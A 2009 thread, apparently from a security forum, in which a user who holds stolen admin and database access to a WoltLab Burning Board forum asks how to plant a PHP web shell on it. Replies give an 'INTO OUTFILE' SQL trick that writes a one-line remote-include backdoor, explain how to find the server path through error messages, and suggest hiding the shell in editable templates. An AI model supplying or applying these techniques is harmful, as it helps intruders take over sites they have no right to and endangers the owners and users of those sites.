 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 67
 Members: 0
 Total: 67
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
WoltLab Burning Board 3.0.8pl (anything possible?) |
|
 Posted: Fri Feb 06, 2009 1:02 pm |
 |
|
| lowbird |
| Regular user |
 |
|
| Joined: Feb 06, 2009 |
| Posts: 5 |
|
|
|
 |
|
 |
|
Hello
I try to get access to a Wbb3.0.8pl Forum (want to drop a shell).
First of all:
- I already have full access to a Mysql-Database which is running on my target- Server.
- I also have Read - Access to the Forum-Database. (i am using Navicat)
- I have two Super-Moderator - accounts.
- I have access to an gmx.net account from one of the two admins.
- Its an Apache/2.2.9 (Fedora) Server
Do anyone maybe know, how i can upload my shell.php on this server ? :S I already tryed several things, but cant get it working. Is there maybe an exploit i could use ?
Hope you have a few new ideas, on what i could try 
(sry for my bad english)
(I write my English examen in 2 weeks but cant speak english lol  ) |
|
|
|
|
|
|
|
|
| Posted: Fri Feb 06, 2009 2:07 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
| Quote: | | I already have full access to a Mysql-Database |
meaning that you have root access on DB ? can you write ?
if true, you can use SQL into outfile to write some file...
SELECT "your php code" INTO OUTFILE 'path/of/yoursite/file.php'
for your php code i mean for example : <?php include($_GET[\'a\']); ?> that will creat and write a file.php that you use like : www.sito.com/file.php?a=yourshell.txt tu include remote shell TXT.
for path/of/yoursite/file.php i mean , the complete path disclosure of your site, generating it with errors on site.. like mysql_fetch_array() on var/www/site for example , or other... |
|
|
|
|
| Posted: Fri Feb 06, 2009 3:46 pm |
|
|
| lowbird |
| Regular user |
|
|
| Joined: Feb 06, 2009 |
| Posts: 5 |
|
|
|
|
|
|
|
Thats the problem.. i dont have the rights, to create a file as MySQL - User.
So SELECT "your php code" INTO OUTFILE 'path/of/yoursite/file.php' doesnt work :S
maybe another idea? |
|
|
|
|
| Posted: Fri Feb 06, 2009 5:09 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
ok.. i' ve just installed this board.. i'm trying to upload a shell from templates..
there is the list of templates.. and the button modify templates...
then you find the html code..
just copy and paste your shell like Joomla templates.. and the find the right path of original template..
haven't you try this way?
if this doesn't work i try to find another way from the cms code... :/
try to create e new group of template.. and then add a template.. i succesfully upload my shell but the extension is .tpl and then there is a problem to read my shell's file... i'm trying..  |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 07, 2009 9:02 am |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| ingh1pped wrote: | ok.. i' ve just installed this board.. i'm trying to upload a shell from templates..
there is the list of templates.. and the button modify templates...
then you find the html code..
just copy and paste your shell like Joomla templates.. and the find the right path of original template..
haven't you try this way?
if this doesn't work i try to find another way from the cms code... :/
try to create e new group of template.. and then add a template.. i succesfully upload my shell but the extension is .tpl and then there is a problem to read my shell's file... i'm trying.. |
Try to get your shell via index.php.I think templates are include from index.php or some other file. |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
